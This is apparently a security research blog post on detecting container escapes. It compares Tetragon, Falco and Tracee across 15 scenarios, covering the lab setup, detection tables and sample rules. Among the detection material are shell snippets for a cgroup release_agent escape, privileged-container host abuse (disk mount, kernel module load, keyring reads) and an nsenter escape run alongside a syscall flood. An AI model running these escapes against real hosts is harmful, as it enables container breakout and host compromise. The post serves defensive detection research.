Container Escape Telemetry, Part 2: Methodology and Tool Architecture
The lab setup, scenario matrix, and tool comparison framework behind the container escape telemetry research. Three eBPF tools, 15 scenarios, one tool per VM, and a PowerShell harness that ties it all together.
This is Part 2 of the container escape telemetry series (overview). Part 1 covered the isolation primitives and eBPF observability model. This post covers the lab architecture, the three tools under test, the 15 escape scenarios, and the detection coverage matrix. If you want to skip straight to what the telemetry actually looks like, jump to Part 3: Per-Scenario Deep Dives.
The Lab
Each tool ran on its own dedicated Hyper-V VM: 3 GB RAM, 2 vCPUs, Ubuntu 22.04 on kernel 5.15.0-91-generic. One tool per VM. This was non-negotiable. eBPF programs from different tools will contend for the same kernel hooks, and if you’re trying to measure event ordering and timing, that contention corrupts your data. You can’t draw conclusions about “tool A generated event X before tool B generated event Y” if both tools are fighting over the same kprobe attachment points on the same kernel.
You might notice this entire setup runs on Windows with PowerShell and Hyper-V rather than a more typical Linux-native approach. The reason is mundane: my gaming PC has 48 GB of RAM, and computers are way too expensive these days to justify a dedicated lab machine. So Vagrant + Hyper-V it is.
Automation
A PowerShell harness (run.ps1) automated the full workflow per VM: reload the VM to apply kernel parameters, upload scenario scripts via SCP, install the assigned tool, execute all 15 scenarios through a bash harness that records start/end timestamps as JSONL markers, then download results. Those markers are what let me correlate tool events to specific scenario windows with precision. Each scenario runs between a MARKER-S{N}-START and MARKER-S{N}-END container, and every tool captures these container lifecycle events, giving me exact time boundaries to slice the telemetry.
The automation matters for reproducibility. Every run follows the same sequence, with the same sleep intervals, on a freshly reloaded VM. If I need to change a tool’s configuration and re-run, the harness guarantees the same scenario execution order and timing.
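The marker scheme is simple enough to sketch. This is an illustrative reconstruction, not the actual harness internals – the function name, JSON shape, and file names are assumptions:

```shell
#!/usr/bin/env bash
# Sketch of the marker scheme (names and JSON shape are illustrative,
# not the actual run.ps1/bash harness internals).
run_scenario() {
  local n="$1" script="$2"
  # Marker containers bracket the scenario. Every tool records container
  # lifecycle events, so these give exact time boundaries for slicing.
  docker run --rm --name "MARKER-S${n}-START" busybox true
  printf '{"scenario":%s,"phase":"start","ts":"%s"}\n' \
    "$n" "$(date -u +%FT%T.%NZ)" >> results.jsonl
  bash "$script" || true   # a scenario may legitimately fail (PATTERN/BLOCKED)
  printf '{"scenario":%s,"phase":"end","ts":"%s"}\n' \
    "$n" "$(date -u +%FT%T.%NZ)" >> results.jsonl
  docker run --rm --name "MARKER-S${n}-END" busybox true
}
```

The JSONL timestamps give the analysis scripts a coarse window; the marker containers give each tool's own event stream an unambiguous in-band boundary.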
Why This Kernel
Kernel 5.15.0-91-generic was chosen deliberately, not by default. Several constraints intersected:
- cgroup v1 is required for S01 and S02 (cgroup `release_agent` escapes). The VMs boot with `systemd.unified_cgroup_hierarchy=0` to force cgroup v1.
- CVE-2022-0492 (S02) is patched on this kernel – the unprivileged unshare-to-cgroup exploit path fails with EACCES. That's intentional: S02 tests the CVE path, observes the failure, then falls back to a privileged `release_agent` escape. The failed attempt still generates telemetry (the EACCES return), and the fallback still succeeds because the container is privileged and cgroup v1 is available.
- CVE-2022-0847 DirtyPipe (S08) requires a kernel in the 5.8-5.16.10 range to actually exploit. Kernel 5.15.0-91 is in that window, so S08 produces a real exploit – splice() actually corrupts the page cache and overwrites /etc/passwd. On a patched kernel, you'd still see the syscall pattern but not the actual escape. That real exploit is one of the most compelling data points in the whole series.
- CVE-2022-0185 (S09) and CVE-2021-22555 (S10) are already patched on this kernel, so those run in PATTERN mode – the syscall sequence fires but the kernel rejects the exploit. That's fine for telemetry analysis. The tool still sees every syscall; it just doesn't result in privilege escalation.
A newer 6.x kernel would sacrifice the real DirtyPipe exploit. I aimed for real exploitation wherever possible in this project – pattern-only scenarios are useful, but watching splice() actually corrupt the page cache and overwrite /etc/passwd produces telemetry you can't get any other way.
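Both kernel constraints are cheap to verify before a run. A quick sanity-check sketch (the expected kernel string is from the lab spec above):

```shell
# Sanity checks before a run: confirm the kernel and that the VM actually
# booted into cgroup v1 (the S01/S02 prerequisite).
uname -r   # expect 5.15.0-91-generic on the lab VMs

# cgroup v2 exposes a single cgroup2fs at /sys/fs/cgroup; the v1 hybrid
# layout mounts a tmpfs there with per-controller subdirectories.
fstype="$(stat -fc %T /sys/fs/cgroup)"
case "$fstype" in
  tmpfs)     echo "cgroup v1 hybrid hierarchy: S01/S02 can run" ;;
  cgroup2fs) echo "cgroup v2: the release_agent scenarios will not work" ;;
esac
```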
The 15 Scenarios
The scenarios break into five categories. Each scenario is a self-contained shell script that creates its own container, runs the technique, checks for success, and cleans up. Result states: ESCAPED (technique worked), EXPLOITED (a kernel CVE actually fired, not just its syscall pattern), PATTERN (syscall sequence fired on a patched kernel), BLOCKED (kernel or runtime prevented the technique), ABUSED (dangerous capabilities exercised without crossing a namespace boundary), or TELEMETRY_TEST (stress test measuring tool reliability).
Misconfiguration-Based Escapes (S01-S05)
These work on any kernel version because they exploit configuration mistakes, not kernel vulnerabilities.
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S01 | cgroup release_agent | ESCAPED | Mounted cgroupfs v1, wrote release_agent, triggered host code execution |
| S02 | CVE-2022-0492 + fallback | ESCAPED | unshare to user/cgroup ns failed (patched), privileged fallback succeeded |
| S03 | nsenter --pid=host | ESCAPED | nsenter -t 1 -m -u -i -p joined all host namespaces |
| S04 | Docker socket mount | ESCAPED | Used mounted docker.sock to spawn container with host root filesystem |
| S05 | Host /proc access | ESCAPED | Read /proc/1/root, core_pattern, mountinfo, environ from privileged container |
S01 is the classic. Mount the cgroup filesystem, create a child cgroup, write to notify_on_release and release_agent, trigger it by writing to cgroup.procs. The host kernel executes your payload. S02 tries the same thing through the CVE-2022-0492 path first (unshare into new user + cgroup namespaces), fails because the kernel is patched, then falls back to the privileged container path. S03 is the simplest: nsenter -t 1 -m -u -i -p joins the host’s namespaces directly. S04 mounts the Docker socket and uses it to spawn a new container with the host filesystem. S05 reads sensitive files through the host’s /proc filesystem that a privileged container can access.
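The S01 sequence condenses to a few lines. This is a hedged sketch wrapped in a function so nothing executes on source – it assumes a privileged container on a cgroup v1 host, and the overlayfs upperdir trick (from the classic PoC) assumes Docker's default storage driver:

```shell
# The S01 sequence, condensed into a function (nothing runs on source).
# Assumes: privileged container, cgroup v1 host, overlay2 storage driver.
s01_release_agent() {
  local d=/tmp/cgrp
  mkdir -p "$d" && mount -t cgroup -o rdma cgroup "$d" && mkdir -p "$d/x"
  echo 1 > "$d/x/notify_on_release"
  # release_agent is resolved in the HOST mount namespace, so we need the
  # container rootfs path as the host sees it (the overlay upperdir).
  local host_path
  host_path="$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)"
  echo "$host_path/payload.sh" > "$d/release_agent"
  printf '#!/bin/sh\ntouch /tmp/escaped-on-host\n' > /payload.sh
  chmod +x /payload.sh
  # When the last process in the child cgroup exits, the host kernel
  # executes release_agent as root.
  sh -c "echo \$\$ > $d/x/cgroup.procs"
}
```

Each write in that sequence (the mount, the release_agent write, the cgroup.procs write) is a distinct hook point, which is why the three tools see S01 so differently.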
All five succeed. All five generate distinct telemetry signatures. The value of having all five is that they exercise different kernel mechanisms (mount, setns, socket_connect, file_open) and produce different event patterns across the three tools.
Baseline Control (S06)
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S06 | Unprivileged container | NO ESCAPE | mount and unshare denied, no escape signals |
S06 runs a standard unprivileged container that performs normal operations: file reads, process spawning, network lookups. No escape attempt. This is the noise floor. Tetragon generated 1,127 events from its policy hooks, Falco generated 76, Tracee generated 29. Anything a real escape generates needs to be distinguishable from this baseline.
CVE-Based Exploits (S07-S12)
These generate the exploit syscall patterns. Some actually exploit the vulnerability (S08), some fire the pattern on a patched kernel (S09, S10), and some are blocked by the runtime (S11, S12).
| ID | CVE | Result | What Happened |
|---|---|---|---|
| S07 | CVE-2024-21626 (Leaky Vessels) | PATTERN | runc 1.1.11 WORKDIR /proc/self/fd/7; fd leak didn’t manifest in this environment |
| S08 | CVE-2022-0847 (DirtyPipe) | EXPLOITED | Real exploit: splice() overwrote /etc/passwd via page cache corruption |
| S09 | CVE-2022-0185 (fsconfig) | PATTERN | unshare(CLONE_NEWUSER), fsopen(“ext4”), fsconfig(). Kernel patched. |
| S10 | CVE-2021-22555 (Netfilter) | PATTERN | unshare(USER|NET), NETLINK_NETFILTER socket, raw socket creation |
| S11 | CVE-2025-31133 (maskedPaths) | BLOCKED | Symlinks to /proc/sysrq-trigger and core_pattern; writes blocked by read-only /proc |
| S12 | CVE-2019-5736 (runc overwrite) | BLOCKED | /proc/self/exe write returned ETXTBSY. Patched runc prevented overwrite. |
S07 and S12 use a helper script to swap in vulnerable runc versions (1.1.11 and 1.0.0-rc2) for the duration of the scenario, then restore the patched version afterward. S07's fd leak didn't manifest in the lab's Docker/containerd version – the leaked file descriptor existed but pointed to a non-exploitable target – so the syscall pattern fires but the escape doesn't complete. S08 is the standout: a real DirtyPipe exploit that corrupts the page cache via splice() and overwrites /etc/passwd with a root entry. The telemetry difference between "pattern on patched kernel" and "actual exploitation" turns out to matter a lot, and I'll dig into that in Part 3.
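The swap itself is the uninteresting part, but for completeness, a minimal sketch of the shape of that helper (illustrative only – the real script also stops scenario containers and handles containerd state):

```shell
# Sketch of the runc swap used around S07/S12 (illustrative; the real
# helper also stops containers and handles containerd state).
swap_runc() {   # swap_runc <vulnerable-binary> <installed-path>
  cp "$2" "$2.patched"   # stash the patched binary for restore
  cp "$1" "$2"
}
restore_runc() {   # restore_runc <installed-path>
  mv "$1.patched" "$1"
}
```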
Capability Abuse (S13-S14)
These came from reviewer feedback: “I would have loved if one of your scenarios was taking a privileged container that isn’t a straight break out.” Fair point. Not every dangerous container action crosses a namespace boundary. Sometimes the damage happens entirely within the container’s existing privileges.
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S13 | --privileged post-exploit | ABUSED | Mounted host block device, loaded kernel module, read /dev/kmsg, enumerated keyrings, accessed BPF subsystem |
| S14 | Excessive capabilities | ABUSED | Read /proc/1/environ and /proc/1/maps via CAP_SYS_PTRACE + --pid=host, raw sockets via CAP_NET_RAW, mounts via CAP_SYS_ADMIN |
S13 is the “someone ran --privileged because their eBPF tool told them to” scenario. The container gets all capabilities, all devices, no seccomp, no AppArmor. It doesn’t try to escape – it doesn’t need to. It mounts the host’s block device, loads a kernel module, reads the kernel log buffer, enumerates keyrings (which are not namespace-aware, so any container can read the root keyring), and loads an eBPF program. S14 is the subtler case: specific dangerous capabilities (CAP_SYS_PTRACE, CAP_NET_RAW, CAP_SYS_ADMIN) without full --privileged. Teams try to be granular but still over-grant.
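The S13 action list, condensed into a function so nothing runs on source. The device name and module path are illustrative, and everything assumes a `--privileged` container:

```shell
# S13 condensed (nothing runs on source). Requires --privileged;
# /dev/sda1 and hello.ko are illustrative stand-ins.
s13_privileged_abuse() {
  mkdir -p /mnt/host
  mount /dev/sda1 /mnt/host   # host block device, exposed by --privileged
  head -n 20 /dev/kmsg        # kernel log buffer
  cat /proc/keys              # keyrings are not namespace-aware
  insmod ./hello.ko           # load a kernel module
  bpftool prog list           # touch the BPF subsystem
}
```

None of these crosses a namespace boundary, yet each one is host-impacting – which is exactly what makes S13 a useful detection test.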
The key question these answer: if something has dangerous privileges and isn’t doing a textbook namespace escape, do these tools even notice?
Stress Test (S15)
| ID | Technique | Result | What Happened |
|---|---|---|---|
| S15 | Syscall flood + concurrent escape | TELEMETRY_TEST | 7-phase flood measuring ring buffer resilience under adversarial load |
S15 answers the question from Part 1: can an attacker actually blind a security tool by flooding syscalls? Seven phases in two groups. Phases 1-3 flood getpid() at 1K, 100K, and 1M calls (unhooked – no tool generates events). Phases 4-5 and 7 flood openat(/dev/null) at 100K, 1M, and 10M calls (hooked – generates real ring buffer pressure). Phase 6 is the critical test: 1M openat flood running concurrently with an nsenter -t 1 -m -u -i -p escape. Can the tool see the escape during the flood?
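A condensed sketch of the hooked-syscall flood and the Phase 6 race (the real harness uses a compiled flooder for throughput; a shell loop makes the mechanism clear, and the `nsenter` line only works from a suitably privileged container):

```shell
# Condensed S15: a hooked-syscall flood plus the Phase 6 concurrent escape.
# The real harness uses a compiled flooder; a shell loop shows the idea.
flood_openat() {   # every iteration opens /dev/null, hitting the
  local n="$1" i   # file-open hooks the tools attach to
  for ((i = 0; i < n; i++)); do
    : < /dev/null
  done
}
phase6() {
  flood_openat 1000000 &                # 1M hooked calls in the background...
  nsenter -t 1 -m -u -i -p sh -c id     # ...while the escape runs concurrently
  wait
}
```

The question Phase 6 poses is whether the handful of escape events survives the ring buffer contention that the million flood events create.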
The results were the most operationally significant finding in the research. I’ll cover them in detail in Part 4.
The Three Tools
Before diving into what each tool captured, it’s worth understanding why they produce such different telemetry from the same kernel events. The differences aren’t random. They flow directly from how each tool is architected.
Tetragon
Tetragon defines custom eBPF kprobes via TracingPolicy CRDs. For this research, I wrote 8 policies covering 31 kernel function hooks. The critical design choice is that filtering happens in the kernel: if an event doesn’t match a TracingPolicy, it never enters the ring buffer. Never reaches userspace. Never consumes buffer space.
Every event carries the full 10-namespace inode set with a host/container boolean, uid/gid/euid/egid/suid/sgid/fsuid/fsgid, complete permitted and effective capability sets (every capability listed by name), and full process ancestry up to the configured depth. A single Tetragon event averages ~14,600 bytes. That’s not bloat – it’s forensic self-sufficiency. Every event can be analyzed in complete isolation without correlating against external context.
The tradeoff is authoring cost. Tetragon ships with zero escape-detection policies. The TracingPolicy CRD system is powerful but empty. You’re writing kprobe YAML from scratch, specifying which kernel functions to hook, which arguments to capture, and which filters to apply. That authoring cost is real. But it means every event you get back is exactly the kernel function call you asked for, with the exact arguments you specified.
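To make the authoring cost concrete, here is the shape of a minimal TracingPolicy – an illustrative example, not one of the eight research policies – that hooks the setns syscall and captures both arguments:

```shell
# Shape of a minimal TracingPolicy (illustrative; not one of the 8
# research policies): hook the setns syscall and capture both args.
cat > setns-policy.yaml <<'EOF'
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-setns
spec:
  kprobes:
  - call: "sys_setns"
    syscall: true
    args:
    - index: 0
      type: "int"   # fd referring to the target namespace
    - index: 1
      type: "int"   # nstype flags (CLONE_NEWNS, CLONE_NEWPID, ...)
EOF
```

Multiply this by 31 hooks, each needing the right function name, argument types, and filters, and the authoring cost becomes tangible.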
Falco
Falco takes the opposite approach to coverage. It ships with 400+ community-maintained rules and its eBPF driver captures syscalls broadly, sending events to userspace where the Falco engine evaluates YAML rule conditions. Only rule-matched events are emitted as output. This means the barrier to getting started is low – install Falco, and you immediately have detection coverage for common container escape patterns.
Events carry container name, image, and ID via the container runtime socket, user info, and process ancestry up to a configurable depth. Each event averages ~3,500 bytes. Falco doesn’t provide raw namespace inodes, which limits certain types of forensic correlation. You know a namespace change happened, but you can’t programmatically prove which specific namespace transitioned by comparing inode values.
One important caveat: Falco’s default ruleset detected only 5 of 13 scoreable scenarios (S01-S14, excluding S06 baseline and S15 stress test). I wrote twelve additional custom rules targeting CVE-specific syscalls and capability abuse patterns, and enabled rule_matching=all so overlapping rules fire on the same event. The gaps were entirely configuration-driven, not engine limitations. I’ll cover this in detail in a later post, because it’s one of the most actionable findings from the research.
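For flavor, here is the shape of one such custom rule – the condition and output text are illustrative, not the exact rule from the research:

```shell
# Shape of one custom-rule addition (illustrative condition and output,
# not the exact rule text from the research).
cat > custom-rules.yaml <<'EOF'
- rule: Fsconfig Syscall From Container
  desc: fsopen/fsconfig inside a container, the CVE-2022-0185 setup pattern
  condition: evt.type in (fsopen, fsconfig) and container.id != host
  output: fsconfig-family syscall in container (command=%proc.cmdline container=%container.name)
  priority: WARNING
  tags: [container, cve]
EOF
```

Writing twelve of these is an afternoon of work, not an engineering project – which is why I call the gaps configuration-driven.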
Tracee
Tracee sits in an interesting middle ground. It attaches eBPF tracepoints to 330+ syscalls and runs a behavioral signature engine (the TRC-* signatures) on top. This gives it two telemetry layers: raw syscall capture and derived behavioral events. Each event averages ~1,400 bytes – the most compact of the three tools.
Its standout event types are magic_write and commit_creds. magic_write fires when file content changes through a mechanism that bypasses normal write permissions – which is exactly what page cache corruption does. commit_creds captures the actual kernel credential struct transition, showing old and new uid/gid/capability sets. These are synthesized observations, not raw syscalls. They detect exploit consequences rather than specific syscall sequences, which makes them more resilient to exploit variations. If the next kernel CVE uses a completely different syscall chain to corrupt page cache or escalate credentials, magic_write and commit_creds will still fire. A tool that only matches specific syscall patterns won't.
The tradeoff is that Tracee’s broad hook coverage creates a larger attack surface for ring buffer flooding. With 30 event types in our policy (and 330+ in its default set), an attacker has many possible syscalls to flood. This is manageable with proper policy tuning – particularly path-filtering security_file_open – but it requires understanding which events are high-frequency and scoping them appropriately. I’ll cover the S15 stress test results and what they mean for Tracee deployments in Part 4.
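A scoped invocation along the lines discussed above looks something like this. Flag names follow recent Tracee releases and should be verified against `tracee --help` for your version; the command is built into an array rather than executed:

```shell
# Hedged sketch of a scoped Tracee invocation; flag names follow recent
# Tracee releases - verify against `tracee --help` for your version.
tracee_cmd=(tracee
  --events magic_write,commit_creds,switch_task_ns,security_file_open
  --scope container    # only container-originated events
  --output json)       # one JSON event per line
# "${tracee_cmd[@]}"   # run it (commented out: tracee not installed here)
```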
Architecture Comparison
| Dimension | Tetragon | Falco | Tracee |
|---|---|---|---|
| Collection method | Custom kprobes via TracingPolicy | eBPF syscall driver + rule engine | eBPF tracepoints + behavioral signatures |
| Where filtering happens | In-kernel BPF | Userspace rule engine | In-kernel + userspace behavioral |
| Namespace context | Full 10-ns inode set + is_host | Container name/image/id, no raw inodes | mountNs + pidNs inodes, container metadata |
| Credential detail | Full uid/gid/euid + capability sets | user.uid, cap_effective, cap_permitted | userId, commit_creds old/new structs |
| Process ancestry | Full tree with binary paths + args | proc.aname[N] up to configurable depth | hostParentProcessId chain, parentEntityId |
| Enforcement | In-kernel SIGKILL or syscall return override | Alert only | Alert only |
| Avg event size | ~14,600 bytes | ~3,500 bytes | ~1,400 bytes |
| Default detection coverage | None (author your own policies) | 400+ community rules | 330+ syscall hooks + TRC-* behavioral sigs |
The “where filtering happens” row is the single most important architectural distinction for understanding the tools’ behavior under load. Tetragon’s in-kernel filtering means irrelevant events never consume buffer space. Falco’s userspace filtering means all syscalls hit the buffer, but the rule engine decides what to emit. Tracee’s model is somewhere between: its eBPF programs do per-event-type filtering in-kernel, but event-type prioritization under buffer pressure is not implemented. That distinction drives the S15 results.
Detection Coverage
The table below shows which tools generated escape-specific telemetry for each scenario. I’m not counting generic process lifecycle events – only signals that actually indicate the escape technique was used. The Falco column reflects the final state after my twelve custom rule additions. S15 is a stress test, not an escape scenario, so it’s scored separately.
Legend: ✓ = detected the escape technique, ✗ = missed, △ = partial detection (tool saw related activity but not the core escape mechanism – counts as detected in scoring since it would trigger investigation).
| Scenario | Technique | Tetragon | Falco | Tracee |
|---|---|---|---|---|
| S01 | cgroup release_agent | ✓ mount + cgroup_mkdir + file_open | ✓ release_agent write | ✓ mount + magic_write |
| S02 | CVE-2022-0492 + fallback | ✓ unshare + mount + task_alloc | ✓ release_agent + ns change | ✓ switch_task_ns + magic_write |
| S03 | nsenter | ✓ setns() x4 with ns type flags | ✓ Namespace Change x5 + Nsenter Execution | ✓ setns x4 + switch_task_ns x4 |
| S04 | Docker socket | ✓ socket_connect to docker.sock | △ Docker Socket Access (runc init only) | ✓ security_socket_connect x5 |
| S05 | Host /proc | ✓ file_open on /proc/1/root/*, core_pattern | ✓ Sensitive Host File Read x3 | ✓ security_file_open |
| S07 | Leaky Vessels | ✗ No fd-leak hook | ✗ No fd-leak rule | ✗ No fd-leak signature |
| S08 | DirtyPipe | ✓ splice/do_splice with file paths | ✓ splice (custom rule) | ✓ splice + 961 magic_write |
| S09 | fsconfig | ✓ fsopen + fsconfig + cap_capable | ✓ fsconfig (custom rule) | ✓ unshare + commit_creds |
| S10 | Netfilter | ✓ setsockopt + unshare | ✓ netlink socket (custom rule) | ✓ unshare + commit_creds + setsockopt |
| S11 | maskedPaths | ✓ symlink() x2 to /proc targets | ✓ symlink (custom rule) | ✓ symlink x2 |
| S12 | runc overwrite | ✓ bprm_check + file_open /proc/self/exe | ✗ Write blocked before observation | △* openat(/proc/self/exe) ret=ETXTBSY |
| S13 | Privileged post-exploit | ✓ mount + keyctl + security_file_open | ✓ Keyctl + Kernel Log + Mount + Raw Socket | ✓ mount + security_file_open + keyctl + commit_creds |
| S14 | Excessive capabilities | ✓ mount + keyctl + security_file_open | ✓ Host Environ + Host Maps + Mount + Packet socket | ✓ security_file_open + mount + tcpdump exec |
*△* for Tracee S12 requires the openat event to be explicitly enabled in the policy; it is not in Tracee’s default event set.
Detection Scores (13 scoreable scenarios: S01-S14 excluding the S06 baseline; S15 is a stress test and scored separately; △ counts as detected, △* does not in the base score):
| Tool | Real-Time Detection |
|---|---|
| Tetragon | 12/13 |
| Tracee | 11/13 (12/13 with openat event enabled) |
| Falco | 11/13 (5/13 before custom rules) |
What the Scores Don’t Tell You
The aggregate scores are useful for a quick comparison, but they flatten out qualitative differences that matter enormously in practice. A checkmark in the detection column doesn’t tell you:
- What context the event carries. Tetragon's `setns()` events include before/after namespace inode pairs with type flags decoded. Falco's "Namespace Change" alert tells you it happened but not which namespaces transitioned. Both get a checkmark, but one gives you forensic evidence and the other gives you a detection.
- Whether the detection required custom work. Falco's 11/13 includes 6 scenarios that only work because I wrote custom rules (the other 5 use default rules). Tetragon ships with zero escape-detection policies, so all 12 detections required custom TracingPolicies. Tracee's 11/13 includes behavioral signatures that ship by default. The out-of-box experience is very different.
- How the tool handles the scenario it missed. All three tools miss S07 (Leaky Vessels). But the reason is the same for all of them: the fd-leak attack doesn't produce a distinctive syscall pattern that can be hooked. The WORKDIR during `docker build` just looks like a normal process with an unusual working directory. This is a fundamentally hard detection problem, not a tool limitation.
The S06 baseline is important context for everything that follows. It shows what “normal” telemetry looks like from an unprivileged container where mount and unshare are both denied. Tetragon generated 1,127 events from its policy hooks with zero escape-specific signals. This is the noise floor against which everything else should be compared. If your detection can’t distinguish escape activity from that baseline, it’s not a useful detection.
What Comes Next
With the lab, tools, and coverage matrix established, Part 3 digs into the per-scenario telemetry: what each tool actually captured, what the events look like, and what patterns emerge when you compare the raw data across tools. That’s where the qualitative differences behind the checkmarks become concrete.
If you’re more interested in operational questions – how much data do these tools generate, what does the signal-to-noise look like, and which tool should you actually deploy – skip to Part 4.
The full scenario scripts, Tetragon policies, Falco rules, and automation harness are available in the research repository.
References
CVEs and Vulnerability Research
- S01 – cgroup release_agent: Felix Wilhelm’s original PoC (2019); Trail of Bits writeup
- S02 – CVE-2022-0492: Palo Alto Unit 42 analysis; kernel patch commit
- S07 – CVE-2024-21626 (Leaky Vessels): Snyk disclosure and analysis; runc security advisory
- S08 – CVE-2022-0847 (DirtyPipe): Max Kellermann’s original writeup; kernel patch commit
- S09 – CVE-2022-0185 (fsconfig heap overflow): Crusaders of Rust writeup; kernel patch commit
- S10 – CVE-2021-22555 (Netfilter OOB write): Andy Nguyen’s writeup; kernel patch commit
- S11 – CVE-2025-31133 (maskedPaths symlink race): Moby security advisory
- S12 – CVE-2019-5736 (runc /proc/self/exe overwrite): Aleksa Sarai’s original disclosure; runc patch PR
Tool Documentation
- Tetragon: TracingPolicy reference; GitHub repository
- Falco: Rules documentation; Default ruleset; GitHub repository
- Tracee: Events documentation; Behavioral signatures; GitHub repository
Kernel Documentation
- cgroup v1 release_agent – kernel documentation for cgroup notification mechanism
- namespaces(7) – overview of Linux namespaces
- capabilities(7) – Linux capability model
- BPF ring buffer – kernel documentation for the eBPF ring buffer used by Tetragon and Tracee
